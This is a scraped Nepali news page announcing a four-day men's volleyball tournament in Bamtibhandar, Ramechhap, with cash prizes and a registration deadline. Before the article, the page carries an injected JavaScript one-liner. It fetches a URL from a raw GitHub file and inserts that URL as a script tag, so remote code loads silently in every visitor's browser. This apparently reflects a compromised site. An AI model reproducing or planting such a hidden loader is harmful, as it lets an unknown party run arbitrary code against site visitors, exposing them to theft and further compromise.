;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); बाम्तिभण्डारमा भलिबल प्रतियोगिता हुने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • बाम्तिभण्डारमा भलिबल प्रतियोगिता हुने
खेलकुद

बाम्तिभण्डारमा भलिबल प्रतियोगिता हुने

फागुण ०५,

रामेछाप । रामेछापको उमाकुण्ड गाउँपालिका वडा नं २ बाम्तिभण्डारमा भलिबल प्रतियोगिता हुने भएको छ ।

सिद्देश्वर माद्यामिक बिद्यालयको आयोजनामा फागुन २३ गतेदेखि २६ गतेसम्म चार दिन खुल्ला पुरुष भलिबल प्रतियोगिता आयोजना हुने भएको हो । खेल बाम्तिभण्डारको लुँबुमा खेल आयोजना हुने छ ।

सिद्देश्वर मा.विका पूर्व विद्यार्थी गेल्जे लामा शेर्पाकाे प्रायाेजनमा खले आयोजना गरेको आयोजकले जनाएको छ ।

चारदिले सम्मा हुने खेलमा प्रथम हुनेले ६० हजार नगद् सहित शिल्ड, मेडल र प्रमाणपत्र प्रदान् गरिने छ ।

त्यस्तै दोस्रो हुनेले नगद् ४० हजारको साथमा शिल्ड, मेडल र प्रमाणपत्र प्रदान गरिने छ ।

त्यस्तै तेस्रो र सान्त्वना हुनेलाई क्रमश २५ हजार र १५ हजारको साथमा शिल्ड, मेडल र प्रमाणपत्र प्रदान गरिने आयोजकेल जनाएको छ ।

साथै खेलमा उत्कृट सटर, ब्लकर, लिफ्टर, डिफेन्डर र खेलाडीहरुलाई जनही दुई हजारसहित ट्रफि पनि प्रदान गरिने छ । खेल खेल्न ईच्छुक टिमले आगामी फागुण २२ गते अपरान्ह् ४ बजेसम्म टिम दर्ता गर्न पनि आयोजकले अनुरोध गरेको छ ।

सूचना हेर्नुहोस्

No photo description available.

फेसबुक प्रतिक्रियाहरु